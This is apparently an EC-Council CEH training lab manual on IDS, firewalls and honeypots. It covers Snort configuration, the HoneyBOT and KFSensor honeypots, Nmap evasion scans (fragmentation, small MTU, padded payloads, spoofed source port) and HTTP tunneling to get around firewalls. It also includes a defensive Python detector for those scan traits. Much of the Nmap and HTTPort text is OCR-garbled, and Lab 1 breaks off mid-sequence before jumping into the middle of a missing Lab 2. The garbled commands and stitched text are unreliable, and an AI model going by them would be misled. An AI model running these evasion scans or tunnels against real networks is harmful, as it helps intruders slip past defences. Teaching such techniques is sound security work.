CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots

CEH Lab Manual
Evading IDS, Firewalls, and Honeypots
Module 12

Tools demonstrated in this lab are available in Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots

Intrusion Detection Systems

An intrusion detection system (IDS) is a device or software application that monitors networks and/or systems for malicious activities or policy violations and produces reports to a management station.

Lab Scenario

Adoption of Internet use throughout the business world has in turn boosted network usage. To protect their networks, organizations are using various security measures such as firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), honeypots, and others. Networks are the most preferred targets of hackers to compromise an organization's security, and attackers find new ways to breach networks and attack target organizations. To become an expert Penetration Tester and Security Administrator, you must possess sound knowledge of network intrusion prevention systems (IPSs), intrusion detection systems (IDSs), malicious network activity, and log information.
Lab Objectives

The objective of this lab is to help students learn and detect intrusions in a network, log, and view all log files. In this lab, you will learn how to:

- Install and configure Snort IDS
- Detect Intruders Using HoneyBOT
- Detect Intruders and Worms Using KFSensor Honeypot IDS
- Bypass Windows Firewall Using Nmap
- Bypass Firewall Rules Using HTTP/FTP Tunneling
- Bypass Windows Firewall Using Metasploit

Lab Environment

To complete this lab, you will need:

- A computer running Windows Server 2016
- A computer running Windows Server 2012, Windows 10, Windows 8 and Kali Linux as virtual machines
- WinPcap drivers installed in the Windows Server 2016 machine
- Notepad++ installed in the Windows Server 2016 machine
- ActivePerl installed in the Windows Server 2016 machine to run Perl scripts
- Administrative privileges to configure settings and run tools
- A web browser with Internet access

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Lab Duration

Time: 99 Minutes

Overview of Intrusion Detection System

An intrusion detection system (IDS) is a device or software application that monitors network and/or system activities for malicious activities or policy violations and produces reports to a management station. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding. Today, IDPSs have several response techniques that involve their stopping the attack itself, thus changing the security environment. IDPSs are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.

Lab Tasks

Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.
Recommended labs to assist you in using the IDS are:

- Detecting Intrusions using Snort
- Detecting Malicious Network Traffic using HoneyBOT
- Detecting Intruders and Worms using KFSensor Honeypot IDS
- Bypassing Windows Firewall using Nmap Evasion Techniques
- Bypassing Firewall Rules using HTTP/FTP Tunneling
- Bypassing Windows Firewall using Metasploit

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Lab 1: Detecting Intrusions using Snort

Snort is an open source network intrusion detection and prevention system (IDS/IPS).

Lab Scenario

The goal of the Intrusion Detection Analyst is to find possible attacks against a network. The past few years have witnessed a significant increase in DDoS attacks on the Internet, making network security a great concern. Analysts must do this by examining IDS logs and packet captures, and corroborating them with firewall logs, known vulnerabilities, and general trending data from the Internet. IDS attacks are becoming more sophisticated, so sorting the attack events in real time and categorizing them has become a critical challenge. They result in huge amounts of data, and from this data, analysts must look for some kind of pattern. However, the overwhelming flow of events generated by IDS sensors makes it hard for security analysts to uncover hidden attack plans. To become an expert Penetration Tester and Security Administrator, you must possess sound knowledge of network IPSs, IDSs, malicious network activity, and log information.
Lab Objectives

The objective of this lab is to have students learn about, and understand, IPSs and IDSs. In this lab, you will need to:

- Install Snort and verify Snort alerts
- Configure and validate the snort.conf file
- Test the working of Snort by carrying out an attack test
- Perform intrusion detection

Lab Environment

To complete this lab, you will need:

- A computer running Windows Server 2012 as a virtual machine
- Windows Server 2016 running as the Attacker machine
- Snort located at Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort
- You can download the latest version of Snort from https://snort.org/downloads. If you decide to download the latest version, screenshots might differ
- WinPcap drivers installed on the Windows Server 2016 machine
- Notepad++ installed on the Windows Server 2016 machine
- Administrative privileges to configure settings and run tools

Lab Duration

Time: 20 Minutes

Overview of IPSs and IDSs

An intrusion prevention system is a network security appliance that monitors networks and systems for malicious activity. The IPS's main functions are to identify malicious activity, log information about it, attempt to block/stop it, and report it.

An intrusion detection system is a device or software application that monitors a network and/or systems for malicious activity or policy violations and produces reports to a management station. The IDS performs intrusion detection and attempts to stop detected incidents.

Lab Tasks

1. Launch the Windows Server 2012 virtual machine.
2. To install Snort, navigate to Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort.
3. Double-click the Snort 2.9.11 Installer.exe file. The Snort installation wizard appears.
4. If an Open File - Security Warning pop-up window appears, click Run.
5. Accept the License Agreement, and install Snort by selecting the default options that appear step by step in the wizard.
6. A window appears after successful installation of Snort. Click Close.
7. Click OK to exit the Snort installation window.
   Note: Snort requires WinPcap to be installed on your machine.
8. By default, Snort installs itself in C:\Snort (C:\ or D:\, depending on the disk drive in which the OS is installed).
9. Navigate to the etc folder of the Snort rules in the specified location, Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort\snortrules\etc, copy snort.conf, and paste it in C:\Snort\etc.
10. snort.conf is already present in C:\Snort\etc; replace it with the Snort rules snort.conf file.
11. Copy the so_rules folder from Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort\snortrules and paste it in C:\Snort.
12. Copy the preproc_rules folder from Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort\snortrules, and paste it in C:\Snort. The preproc_rules folder is already present in C:\Snort; replace this folder with the preproc_rules folder taken from snortrules.
13. In the same way, copy the rules folder from Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort\snortrules, and paste it in C:\Snort. The rules folder is already present in C:\Snort; replace it with the rules folder taken from Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Intrusion Detection Tools\Snort\snortrules.
14. Now navigate to C:\Snort and Shift+right-click bin; click Open command window here from the context menu to open it in a command prompt.
15. Type snort and press Enter.
16. The Initialization Complete message is displayed. Press Ctrl+C. Snort exits and comes back to C:\Snort\bin.
17. Now type snort -W. This command lists your machine's physical address, IP address, and Ethernet Drivers, but all are disabled by default.
18. Observe your Ethernet Driver index number and write it down (in this lab, 1).
19. To enable the Ethernet Driver, in the command prompt, type snort -dev -i 1 and press Enter.
20. You see rapidly scrolling text in the command prompt, which means that the Ethernet Driver is enabled and working properly.
21. Leave the Snort command prompt window open, and launch another command prompt window.
22. In the new command prompt, type ping google.com and press Enter.
24. Close both command prompt windows. The verification of the Snort installation and triggering of alerts is complete, and Snort is working correctly in verbose mode.
25. Configure the snort.conf file, located at C:\Snort\etc.
26. Open the snort.conf file with Notepad++.
27. The snort.conf file opens in Notepad++, as shown in the screenshot.
28. Scroll down to the Step #1: Set the network variables section (Line 41) of the snort.conf file. In the HOME_NET line (Line 45), replace any with the IP address of the machine (target machine) on which Snort is running. Here, the target machine is Windows Server 2012, and the IP address is 10.10.10.12.
    Note: This IP address may vary in your lab environment.
29. Leave the EXTERNAL_NET any line as it is.
30. If you have a DNS Server, then make changes in the DNS_SERVERS line by replacing $HOME_NET with your DNS Server IP address; otherwise, leave this line as it is.
31. The same applies to SMTP_SERVERS, HTTP_SERVERS, SQL_SERVERS, TELNET_SERVERS, and SSH_SERVERS.
32. Remember: if you don't have any servers running on your machine, leave the line as it is. DO NOT make any changes in that line.
33. Scroll down to RULE_PATH (Line 104). In Line 104, replace ../rules with C:\Snort\rules; in Line 105, replace ../so_rules with C:\Snort\so_rules; and in Line 106, replace ../preproc_rules with C:\Snort\preproc_rules.
35. Navigate to C:\Snort\rules, and create two text files; name them white_list and black_list and change their file extensions from .txt to .rules.
36. While changing the extension, if any pop-up appears, click Yes.
37. Switch back to Notepad++, scroll down to the Step #4: Configure dynamic loaded libraries section (Line 238). Configure the dynamic loaded libraries in this section.
38. At the path to dynamic preprocessor libraries (Line 243), replace /usr/local/lib/snort_dynamicpreprocessor/ with your dynamic preprocessor libraries folder location.
39. In this lab, the dynamic preprocessor libraries are located at C:\Snort\lib\snort_dynamicpreprocessor.
40. At the path to base preprocessor (or dynamic) engine (Line 246), replace /usr/local/lib/snort_dynamicengine/libsf_engine.so with your base preprocessor engine, C:\Snort\lib\snort_dynamicengine\sf_engine.dll.
41. Comment (#) the dynamic rules libraries line (Line 249), as you have already configured the libraries in dynamic preprocessor libraries.
42. Scroll down to the Step #5: Configure preprocessors section (Line 252). The listed preprocessors do nothing in IDS mode, but generate errors at runtime.
43. Comment out all the preprocessors in this section by adding # before each preprocessor rule (Lines 251-255).
44. Scroll down to line 325 and delete the lzma keyword.
45. Scroll down to the Step #6: Configure output plugins section (Line 512). In this step, provide the location of the classification.config and reference.config files.
46. These two files are in C:\Snort\etc. Provide this location of the files in configure output plugins (Lines 531 and 532), i.e., C:\Snort\etc\classification.config and C:\Snort\etc\reference.config.
47. In this Step #6, add the line (Line 623) output alert_fast: alerts.ids, for Snort to dump all logs in the alerts.ids file.
48. In the snort.conf file, find and replace the ipvar string with var. To do this, press Ctrl+H on the keyboard. The Replace window appears; enter ipvar in the Find what: text field, enter var in the Replace with: text field and click Replace All.
49. By default, the string is ipvar, which is not recognized by Snort, so replace it with the var string, and then close the window.
    Note: Snort now supports multiple configurations based on VLAN Id or IP subnet within a single instance of Snort. This allows administrators to specify multiple snort configuration files and bind each configuration to one or more VLANs or subnets rather than running one Snort for each configuration required.
50. Click Close to close the Replace window.
51. Go to lines 504-509 and remove the backslash at the end of each line (if any).
52. Comment out lines 504-509, as shown in the screenshot.
53. Save the snort.conf file.
54. Before running Snort, you need to enable detection rules in the Snort rules file. For this, we have enabled ICMP rules so that Snort can detect any host discovery ping probes to the system running Snort.
55. Navigate to C:\Snort\rules and open the icmp-info.rules file with Notepad++.
56. Type alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.10.12 (msg:"ICMP-INFO PING"; icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; classtype:bad-unknown; sid:472; rev:7;) in line 21, and save.
    Note: The IP address (10.10.10.12) mentioned in $HOME_NET may vary in your lab environment.
57. Now, navigate to C:\Snort and Shift+right-click the folder bin, select Open command window here from the context menu to open it in the command prompt.
58. Type snort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii and press Enter to start Snort (replace X with your device index number; in this lab, 1).
59. If you receive a fatal error, you should first verify that you have typed the modifications correctly into the snort.conf file, and then search through the file for entries matching your fatal error message.
60. If you receive an error stating "could not create the registry key", then run the command prompt as an Administrator.
61. Snort starts running in IDS mode. It first initializes output plugins, preprocessors, and plugins, loads dynamic preprocessor libraries and the rule chains of Snort, and then logs all signatures.
62. If you enter all the command information correctly, you receive a message stating Commencing packet processing; press Enter.

16. You are prompted for the ftp credentials of the Windows Server 2016 machine.
17. In this lab the IP address of Windows Server 2016 is 10.10.10.16, which may differ in your lab environment.
    Note: If Kali gives an error saying the ftp command is not found, then install ftp through the "apt-get install ftp" command.
18. Switch back to Windows Server 2016, and expand the Ports and Remotes nodes at the left side of the HoneyBOT dashboard.
19. Under Ports, you can see the port numbers on which Windows Server 2016 received the requests or attacks.
20. Under Remotes, it records the IP addresses from which it received the requests.
21. Now, right-click any IP address or Port on the left, and click View Details, as shown in the figure, to view the complete details of the request or attack recorded by HoneyBOT.
22. The Packet Log window appears, as shown in the screenshot. It displays the complete log details of the request captured by HoneyBOT.
23. In the screenshot, under Connection Details, you can see the Date and Time of the connection established, and the protocol used.
24. It also shows the Source IP, Port, and Server Port, as shown below.
25. Simultaneously, you can run the telnet command on the Kali Linux machine and observe the log recorded by HoneyBOT on Windows Server 2016.

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Internet Connection Required: Yes / No
Platform Supported: Classroom / iLabs

Lab 3: Detecting Intruders and Worms using KFSensor Honeypot IDS

KFSensor is a Windows-based honeypot IDS.

Lab Scenario
Intrusion detection plays a key role in ensuring the integrity of a system's security. Network Intrusion Detection Systems (NIDS) have long been the best method for rapidly identifying attacks. KFSensor is an NIDS that is easy to install and configure, and is designed for Windows machines.

To become an expert Penetration Tester and Security Administrator, you must possess sound knowledge of network IPSs and IDSs, identify malicious network activity and log information, and stop or block malicious network activity.

Lab Objectives

The objective of this lab is for students to learn and understand IPSs and IDSs. In this lab, you will:

- Detect hackers and worms in a network
- Provide network security

Lab Environment

To complete this lab, you will need:

- KFSensor located at Z:\CEH-Tools\CEHv10 Module 10 Denial-of-Service\Honeypot Tools\KFSensor
- KFSensor installed in Windows 10
- MegaPing located at Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\Honeypot Tools\MegaPing
- MegaPing installed in Windows Server 2016
- If you have decided to download the latest version of these tools, then screenshots might differ
- Administrative privileges to configure settings and run tools

Lab Duration

Time: 10 Minutes

Overview of the Lab

KFSensor contains a powerful internet daemon service that is built to handle multiple ports and IP addresses. It is written to resist denial of service and buffer overflow attacks. Building on this flexibility, KFSensor can respond to connections in a variety of ways, from simple port listening and basic services (such as echo), to complex simulations of standard system services. For the HTTP protocol, KFSensor accurately simulates the way Microsoft's web server (IIS) responds to both valid and invalid requests. As well as being able to host a website, it also handles complexities such as range requests and client side cache negotiations.
This makes it extremely difficult for an attacker to fingerprint, or identify, KFSensor as a honeypot.

Lab Tasks

Note: Ensure that WinPcap is installed before running this lab.

1. In the Windows 10 virtual machine, navigate to Z:\CEH-Tools\CEHv10 Module 10 Denial-of-Service\Honeypot Tools\KFSensor and double-click the installer file.
2. If a User Account Control pop-up appears, click Yes.
3. The KFSensor Evaluation Setup window appears; follow the wizard-driven installation steps to install the application.
4. When Completed the KFSensor Evaluation Setup Wizard appears, uncheck the Launch KFSensor option and click Finish.
5. To launch KFSensor as Administrator, navigate to Start > KFSensor and right-click on KFSensor > More > Run as administrator, as shown in the screenshot.
6. If the User Account Control pop-up appears, click Yes.
7. When the application is launched for the first time, the KFSensor Set Up Wizard appears; click the Cancel button.
8. In the KFSensor application window, click Settings from the menu bar and click Set Up Wizard..., as shown in the screenshot.
9. The KFSensor Set Up Wizard window appears; click the Next button.
10. In the Set Up Wizard - Port Classes window, check all the port classes to include and click Next.
11. Uncheck all the ports with all active native services to include, and click Next.
12. In the Set Up Wizard - Domain window, leave the Domain Name field set to default and click Next.
13. In the Set Up Wizard - EMail Alerts window, leave the options set to default and click Next.
14. In the Set Up Wizard - Options wizard:
    a. Select Cautious from the Denial Of Service Options drop-down list
    b. Select Enable packet dump files from the Network Protocol Analyzer drop-down list
15. Click Next.
16. This sets the DoS options to Cautious mode and saves the packet dump files at the time of the DoS attack.
17. In the Set Up Wizard - Systems Service wizard, leave the option set to default and click Next.
18. In the final step of the Set Up wizard, click Finish.
19. If you want to send KFSensor alerts by email, specify the email address details; otherwise leave it blank and click Next.
20. Select options for Denial of Service, Port Activity, Proxy Emulation, and Network Protocol Analyzer, and click Next.
21. The KFSensor main window appears. It displays the list of ID protocols, Visitor, and Received automatically when it starts. In the window (shown below), all the services in the left block marked with blue icons are the ports currently in use.
22. Launch the Command Prompt as an administrator from the Apps list.
23. At the command prompt, type netstat and press Enter.
24. This will display a list of listening ports.
25. Leave the KFSensor tool running.
26. Follow the wizard-driven installation steps to install MegaPing on Windows Server 2016.
27. Click on MegaPing in the Start menu apps.
28. The About MegaPing pop-up appears; click I Agree to continue.
29. The main MegaPing window opens, as shown in the screenshot.
30. Select Port Scanner in the left pane.
31. Enter the IP address of the Windows 10 machine on which KFSensor is running (in this lab, 10.10.10.10) in the Destination Address List, and click Add.
32. Check the IP address, and click on the Start button to start listening to the traffic on 10.10.10.10.
    Note: This IP address may vary in your lab environment.
33. MegaPing begins to scan for open ports and displays a list of ports.
34. The image below shows the identification of Telnet on port 23.
36. The image below shows the identification of Socks on port 1080, which allows intruders to connect to the machine through a firewall.
37. Now, switch back to the Windows 10 virtual machine. Observe that KFSensor has detected that port 23 is open on this machine.
38. Seeing this port open, you can take proper security measures to close the port, thereby preventing intruders from connecting to this machine from outside.
39. The above image also displays the detection of a Death Trojan on port 2. Seeing this port open, a network administrator can add a firewall rule to block port 2, thereby securing the system from being affected by the Death Trojan.

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Internet Connection Required: Yes / No
Platform Supported: Classroom / iLabs

Lab 4: Bypassing Windows Firewall using Nmap Evasion Techniques

Nmap offers many options for firewall evasion, such as those explored in this lab.

Lab Scenario

Firewalls and IDSs are intended to prevent port scanning tools, such as Nmap, from getting an accurate picture of the networks they are protecting. Indeed, we ought not to be concerned about this to a certain degree, on the grounds that Nmap has numerous features created to bypass these protections.
It has the ability to give you a mapping of a system framework, by which you can see everything from OS versions to open ports. Firewalls and intrusion detection frameworks are made to keep Nmap and other applications from obtaining that data. As a penetration tester, you will come across systems behind firewalls that prevent you from getting the information you want. So, you will need to know how to avoid the firewall rules in place, and to gain information about a host. This step in a penetration test is called Firewall Evasion Rules.

Lab Objectives

The objective of this lab is to help students learn how to bypass a firewall using Nmap.

Lab Environment

To complete this lab, you will need:

- A computer running Windows Server 2016
- Kali Linux running in a virtual machine (Attacker machine)
- Windows 10 running in a virtual machine (Victim machine)
- A web browser with Internet access
- Administrative privileges to run tools

Lab Duration

Time: 10 Minutes

Overview of Lab

Network obstructions such as firewalls can make mapping a network exceedingly difficult. To make things more difficult, stifling casual reconnaissance is often a key goal of implementing the devices.

Lab Tasks

1. Before running this lab, log into the Windows 10 virtual machine, and open the Control Panel; in the All Control Panel Items window, click Windows Firewall.
2. The Windows Firewall window appears; click Use recommended settings to turn on the Firewall.
3. Observe that the Windows Firewall State is On.
4. Switch to the Kali Linux machine, launch a command terminal window, type the following command: nmap -v -sS -T5 <IP Address of the Victim Machine> and press Enter.
5. In this lab, the victim machine's IP address is 10.10.10.10 (Windows 10), which may vary in your lab environment.
6. The -v switch is used to increase the verbosity level, the -sS switch is used to perform a TCP SYN scan, and -T5 is used to set a timing template to perform the scan.
7. This command provides you with the TCP SYN scan output, as shown in this screenshot of the targeted machine (i.e., Windows 10).
8. Type nmap -v -sS -f -T5 <IP Address of the Victim Machine> and press Enter.
9. In this command, we are adding an additional switch, -f, which causes the requested scan (including ping scans) to use tiny fragmented IP packets to be sent to the victim machine. This option can bypass the packet inspection of firewalls.
10. Type nmap -v -sS --mtu 32 -T5 <IP Address of the Victim Machine> and press Enter.
11. The --mtu switch is used to set a specific Maximum Transmission Unit for the packets, so it sets the MTU to 32 in this command. If you want to set an MTU, it should be a multiple of 8 (8, 16, 24, 32, etc.).
12. In this command, during the scan, Nmap will create packets of a size based on a user-provided number.
13. In the screenshot below, we provided a packet size of 32 so that Nmap will create packets of 32 bytes, causing confusion for the Firewall.
14. Type nmap -v -sS --mtu 32 --send-eth -T5 <IP Address of the Victim Machine> and press Enter.
15. --send-eth ensures that Nmap actually sends Ethernet-level packets; it will bypass the IP layer and send raw Ethernet frames.
16. Now, launch Wireshark on the Kali Linux machine to observe the packets. To launch Wireshark, open a new command terminal, type wireshark and press Enter.
17. The Error during loading pop-up appears; click OK to continue. The dialog reads: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:44: dofile has been disabled due to running Wireshark as superuser. See https://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user.
18. The Wireshark main window appears; now, choose the Interface to capture the traffic, and double-click it to start capturing traffic.
Ho 49 Waa Sane py Fae 19, Now, Wireshark will open in capturing mod as shown in the screenshot, sand setum to the nmap command terminal window: BEES 20, Type nmap + 28 4 mtu 32 -send-eth -datelongth 500 -TS and press Enter. 21, Nmap nonmlly sends minimalist packets containing only a header; bere, ‘ve ar setting s dats length up to 800, 22, The TCP switches ate genetaly 40 bytes and ICMP echo request are jst 28; some of the UDP ports and IP protocols will get a custom payload by defait. Sea Namal Pas ‘Bia Hang nd Gomes Cop hy FO nein nol peiclons a tes Ma 12-Evding 18, Frew ort Honeys 23, Sothis switch will append the given number of random bytes to mast of the packets it wll send, 2nd wil not use any protocob-pecifc payloads. maximize the Wireshark window, navigate to Capture, snd click Stop to stop the running capaure. Re SCR hee Module 12-Evadr DS, Prowl al Honeypot 25, Watch the TEP SYM packets traverse through the attacker machine and ‘on to the victim machine. Observe the frame size and data bytes sent to ‘he victim machine. AGUNG Meee 26, Once you have observed the eaptted traffic through Wireshark, go to ‘Capture, and click Start from menu bar, xo that Witesbark will start ‘capturing the tfc agin 27. The prompt De youwant to save the captured packets before starting ‘a new capture? appears; click Continue without Saving 1 start a new capture Unsoved packets o| ‘0 you want to save the captured packets before starting 2 ew capture? ‘Your captred packets wil be lst you dot save them, (Contnie without Sang) Cancel ‘Gata an 0 "ital Hadid Onameracaus Ger © mm SiR Rawal Recetas Matte 12-Evadng 15 Frewala n Honeots 28 Type nmap -v-26 mtu 22 -send-eth ~date-length 50 ~source-port 99:75 aod press Enter, ~source-port is used to spoof the source port umber We re providing port 99, through which Nmap will send the packets. Most of he seanning ‘operations will use raw sockets that inelsde SYN and UDP sea, 30. 
Now, maximize the Wireshark window, and Stop caprusing tfc, a5 shown in the Figure below. ‘SaaS tm Pw not Games oS Motte 12-Evedg 10, Prova, nd Honeypot 51. Expand the Transmission Controt Protocol, and oisrve that trafic is forwarded through the port that we have specified in the command. Lab Analysis ‘Analyze and document the ress relate to this ab exercise, Provide your opinion | of your targets seetity posture and exposure through public and fe information, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Platiorm Supported ‘Bia singed Gomes Coie Tikeckinwen! peroneal sae DWord ew Module 12 Evang OS Frown ond Honeypot Bypassing Firewall Rules using HTTP/FTP Tunneling HITTPortis program from HVT Hast that creates a anparet tae cagh a prog ver oral Lab Scenario Atacker ate alway looking for utes who can be cally compromised so that they can enter networks by IP spoofing to steal data. Hackers can get packets ‘through Frewalls by spoofing IP addres, If amackers are able to expire network traffic yout have lemed ta doin the prevcuslab—:hey can perform “Trojan ana, registry atts, password hijacking anacs, and 0 on, which cn prove disastrous for an organizations’ nenvork Attackers may use x network probe to espn rw packet dat and then ue that oreseve pack information sich as source and destination IP addreses, por, flags, header lengths, ‘heeksums, tine to live (ITL}, and protoeol pe ‘Thus, as a network sdministaun, you should be able wo identify anacks by cextacig information fom capeuted trafic such a source aa destination IP audreses, protocol ype, header length, source and destination ports, and son, and compare these desis with modeled stack signatures to determine if 20 suck has occurred. 
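The scenario above asks the administrator to extract packet fields from captured traffic and compare them with attack signatures. The following added example (not part of the lab manual) does exactly that for the three evasion traits demonstrated in the preceding Nmap lab: fragmented probes (-f / --mtu), SYNs padded with --data-length, and a sweep sent from the fixed --source-port 99. The capture records, the frame() helper and the thresholds are constructed assumptions.

```python
"""Signature checks for the Nmap evasion traits from the previous lab
(-f / --mtu fragmentation, --data-length padding, --source-port 99).

Added example, not from the lab manual. Each record is a constructed
per-frame summary carrying the fields a Wireshark dissection shows
(IP fragment flag/offset, TCP flags, ports, payload length); in practice
the records would come from tshark -T fields or a pcap parser.
"""
from collections import defaultdict

ATTACKER, VICTIM, CLIENT = "10.10.10.11", "10.10.10.10", "10.10.10.20"
SCANNED_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389]


def frame(src, dst, dport, sport=99, flags="S", mf=False, off=0, payload=0):
    """One constructed TCP/IPv4 frame summary (mf = IP More Fragments bit,
    off = fragment offset in bytes, flags = TCP flag letters or None)."""
    return {"src": src, "dst": dst, "proto": "tcp", "mf": mf, "frag_off": off,
            "sport": sport, "dport": dport, "tcp_flags": flags,
            "payload_len": payload}


# Constructed capture covering the lab's scan variants plus benign traffic.
SAMPLE_CAPTURE = (
    # nmap -f: the probe to port 80 is split into 8-byte pieces; the TCP flags
    # byte sits in the second piece, so no fragment shows a complete header.
    [frame(ATTACKER, VICTIM, 80, flags=None, mf=True, off=0),
     frame(ATTACKER, VICTIM, None, sport=None, flags=None, mf=True, off=8),
     frame(ATTACKER, VICTIM, None, sport=None, flags=None, mf=False, off=16)]
    # --data-length 500 --source-port 99: SYNs padded with 500 random bytes,
    # all sent from the same source port to a sweep of destination ports.
    + [frame(ATTACKER, VICTIM, p, payload=500) for p in SCANNED_PORTS]
    # benign client: fresh ephemeral source port per connection, bare SYN.
    + [frame(CLIENT, VICTIM, 443, sport=51234),
       frame(CLIENT, VICTIM, 80, sport=51235)]
)


def fragmented_probes(packets):
    """Fragments of TCP packets. TCP negotiates an MSS, so legitimate TCP is
    almost never fragmented; a split TCP header is a classic IDS signature,
    and only an IDS that reassembles before inspecting sees the flags."""
    return [p for p in packets
            if p["proto"] == "tcp" and (p["mf"] or p["frag_off"] > 0)]


def padded_syns(packets):
    """A SYN carries no application data; --data-length bolts random bytes
    onto it, which shows up as a SYN frame far larger than the usual ~60."""
    return [p for p in packets
            if p["tcp_flags"] == "S" and p["payload_len"] > 0]


def fixed_source_port_sweeps(packets, min_ports=10):
    """One unchanging source port opening connections to many destination
    ports. A real client takes a fresh ephemeral port per connection, so a
    fixed port (here 99) reused across a sweep is the --source-port tell."""
    seen = defaultdict(set)
    for p in packets:
        if p["tcp_flags"] == "S" and p["sport"] is not None:
            seen[(p["src"], p["sport"])].add(p["dport"])
    return {key: sorted(ports) for key, ports in seen.items()
            if len(ports) >= min_ports}


def analyze(packets):
    """Count the evasion signatures present in a capture summary."""
    return {
        "fragmented_frames": len(fragmented_probes(packets)),
        "padded_syn_frames": len(padded_syns(packets)),
        "fixed_sport_sweeps": fixed_source_port_sweeps(packets),
    }


if __name__ == "__main__":
    for name, value in analyze(SAMPLE_CAPTURE).items():
        print(f"{name}: {value}")
```

A firewall that only inspects the first fragment, or that trusts traffic by source port alone, passes all three patterns; the checks above are what an IDS doing fragment reassembly and per-source statistics would raise.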
You can also check attack logs for lists of attacks, and take action accordingly. Also, you should be familiar with HTTP tunneling techniques, by which you can identify additional security risks that may not be readily visible by conducting simple network and vulnerability scanning, and determine the extent to which a network IDS can identify malicious traffic in a communication channel. In this lab, you will learn FTP tunneling using HTTP.

Lab Objectives
This lab will show you how networks can be scanned, and how to use HTTPort and HTTHost to bypass firewall restrictions and access files.

Lab Environment
In this lab, you will need the HTTPort tool.
* HTTPort is located at Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\HTTP Tunneling Tools\HTTPort
* You can download the latest version of HTTPort from the link https://www.targeted.org/htthost
* If you decide to download the latest version, then the screenshots shown in the lab might differ
* Install HTTHost on the Windows Server 2012 virtual machine
* Install HTTPort on the Windows Server 2016 machine
* Follow the wizard-driven installation steps and install it
* Administrative privileges are required to run this tool
* This lab might not work if the remote server filters/blocks HTTP tunneling packets

Lab Duration
Time: 20 Minutes

Overview of HTTPort
HTTPort creates a transparent tunnel through a proxy server or firewall. HTTPort allows using all sorts of Internet software from behind the proxy. It bypasses HTTP proxies and HTTP firewalls, and transparent accelerators.

Lab Tasks
1. Log in to the Windows Server 2012 virtual machine.
2. Wait for the Server Manager to start.
3. The Server Manager window appears; click Add roles and features.
4. The Add Roles and Features Wizard window appears; click Next.
5. The Select installation type section appears; select the Role-based or feature-based installation radio button and click Next.
6. The Select destination server section appears; click Next.
7. Under Select server roles, check Web Server (IIS), and click Next.
Note: If the Add Roles Wizard dialog box appears, click Add Required Features.
8. The Introduction to Web Server (IIS) pane appears; click Next.
9. The Select features section appears; check the Management OData IIS Extension box and click Next.
Note: If the Add Roles Wizard dialog box appears, click Add Required Features.
10. In the Confirmation pane, click Install.
11. Wait for the selected roles to be installed.
12. On completion of installation, you will be redirected to the Results pane.
13. Close the Server Manager window.
14. Now, you need to stop the IIS Admin Service and World Wide Web Publishing Service.
15. Click Start, and navigate to Administrative Tools > Services.
16. Right-click World Wide Web Publishing Service, and click Stop.
Note: HTTPort supports strong traffic encryption, which makes proxy logging useless, and supports NTLM and other authentication schemes.
17. In the same way, right-click IIS Admin Service, and click Stop.
18. Open the mapped network drive and navigate to Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\HTTP Tunneling Tools\HTTHost.
19. Open the HTTHost folder, and double-click htthost.exe.
20. If the Open File - Security Warning pop-up appears, click Run.
21. The HTTHost window appears; click the Options tab.
22. On the Options tab, type 90 in the Port field under the Network section; keep the other settings at their defaults except for Personal password, which should contain any other password. In this lab, the Personal password is "magic".
Note: Typically, HTTP tunneling should be performed using port 80. As port 80 is being used to host the local website, we have used port 90 for this lab.
23. Check Revalidate DNS names and Log connections, and click Apply.
24. Check to see the last line Listener: listening at 0.0.0.0:90, which ensures that HTTHost is running properly and has begun to listen on port 90.
25. Now, leave HTTHost intact, and don't turn off the Windows Server 2012 virtual machine.
26. Now, switch to Windows Server 2016, right-click the Windows icon, and click Control Panel.
27. The Control Panel window appears with all control panel items displayed. Select Windows Firewall.
28. The Windows Firewall control panel appears; click the Turn Windows Firewall on or off link in the left pane.
29. The Customize Settings window appears.
30. Select Turn on Windows Firewall (under Private network settings and Public network settings), and click OK.
32. The firewall is successfully turned on. Now, click Advanced settings in the left pane.
33. The Windows Firewall with Advanced Security window appears.
34. Select Outbound Rules in the left pane. A list of outbound rules is displayed. Click New Rule... in the right pane (under Outbound Rules).
